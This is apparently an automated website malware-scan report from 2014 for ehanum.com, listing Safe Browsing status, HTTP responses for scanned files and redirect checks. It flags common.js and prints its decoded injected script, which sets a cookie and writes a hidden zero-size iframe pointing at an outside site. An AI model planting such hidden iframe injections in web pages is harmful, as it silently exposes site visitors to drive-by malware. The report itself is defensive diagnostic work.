Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ehanum.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ehanum.com/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Thu, 17 Apr 2014 07:46:08 GMT Location: http://ehanum.com/main Server: Microsoft-IIS/6.0 Content-Length: 143 Content-Type: text/html P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC Set-Cookie: PUID=45D565B226864BDF96F4DB6DD5360C9D; domain=ehanum.com; path=/ Set-Cookie: ASPSESSIONIDSAQBBASQ=NDNDIKBDCNFFKNCBEEFBHFFK; path=/ | clean |
http://ehanum.com/main | HTTP/1.1 301 Moved Permanently Date: Thu, 17 Apr 2014 07:46:08 GMT Location: http://ehanum.com/main/ Server: Microsoft-IIS/6.0 Content-Length: 169 Content-Type: text/html | clean |
http://ehanum.com/main/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Thu, 17 Apr 2014 07:46:09 GMT Location: /main/main_real.asp Server: Microsoft-IIS/6.0 Content-Length: 140 Content-Type: text/html P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC Set-Cookie: PUID=F9C85F7D69DE4CF2BD870107D11DF1A2; domain=ehanum.com; path=/ Set-Cookie: ASPSESSIONIDSAQBBASQ=PDNDIKBDMFCOAHCPPLOOMIPB; path=/ | clean |
http://ehanum.com/main/main_real.asp | 200 OK Content-Length: 44027 Content-Type: text/html | clean |
http://ehanum.com/jscript/common.js | 200 OK Content-Length: 22491 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.nlh.or.kr String.prototype.trim = function() { return this.replace(/(^\s*)|(\s*$)/g, ""); } String.prototype.stripspace = function() { return this.replace(/ /g, ""); } String.prototype.replaceAll = function(a, b) { var s = this; var n1, n2, s1, s2; while (true) { if ( s=="" || a=="" ) break; n1 = s.indexOf(a); if ( n1 < 0 ) break; n2 = n1 + a.length; if ( n1==0 ) { s1 = b; ...[19337 bytes skipped]... Decoded script: if(document.cookie.indexOf('xiao=')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='xiao=Yes;path=/;expires='+expires.toGMTString();document.write("<iframe src=http://www.nlh.or.kr/index.html width=0 height=0></iframe>")} if(document.cookie.indexOf('xiao=')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='xiao=Yes;path=/;expires='+expires.toGMTString();document.write("<iframe src=http://www.nlh.or.kr/index.html width=0 height=0></iframe>")} <iframe src=http://www.nlh.or.kr/index.html width=0 height=0></iframe> | ||
http://ehanum.com/jscript/embed.js | 200 OK Content-Length: 2953 Content-Type: application/x-javascript | clean |
http://ehanum.com/jscript/ajax.js | 200 OK Content-Length: 2356 Content-Type: application/x-javascript | clean |
http://ehanum.com/jscript/json.js | 200 OK Content-Length: 5093 Content-Type: application/x-javascript | clean |
http://ehanum.com/jscript/rollover.js | 200 OK Content-Length: 1033 Content-Type: application/x-javascript | clean |
http://ehanum.com/jscript/user_func.js | 200 OK Content-Length: 2552 Content-Type: application/x-javascript | clean |
http://ehanum.com/jscript/sns.js | 200 OK Content-Length: 3789 Content-Type: application/x-javascript | clean |
http://ehanum.com/popup_main.js.asp | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://ehanum.com/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://ehanum.com/jscript/cookie.js | 200 OK Content-Length: 1022 Content-Type: application/x-javascript | clean |
http://ehanum.com/jscript/floating.js | 200 OK Content-Length: 3636 Content-Type: application/x-javascript | clean |
http://ehanum.com/jscript/left_floating.js | 200 OK Content-Length: 3732 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ehanum.com
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Thu, 17 Apr 2014 07:46:08 GMT
Location: http://ehanum.com/main
Server: Microsoft-IIS/6.0
Content-Length: 143
Content-Type: text/html
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: PUID=45D565B226864BDF96F4DB6DD5360C9D; domain=ehanum.com; path=/
Set-Cookie: ASPSESSIONIDSAQBBASQ=NDNDIKBDCNFFKNCBEEFBHFFK; path=/
...143 bytes of data.
GET / HTTP/1.1
Host: ehanum.com
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Thu, 17 Apr 2014 07:46:08 GMT
Location: http://ehanum.com/main
Server: Microsoft-IIS/6.0
Content-Length: 143
Content-Type: text/html
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: PUID=45D565B226864BDF96F4DB6DD5360C9D; domain=ehanum.com; path=/
Set-Cookie: ASPSESSIONIDSAQBBASQ=NDNDIKBDCNFFKNCBEEFBHFFK; path=/
...143 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ehanum.com
Referer: http://www.google.com/search?q=ehanum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ehanum.com
Referer: http://www.google.com/search?q=ehanum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.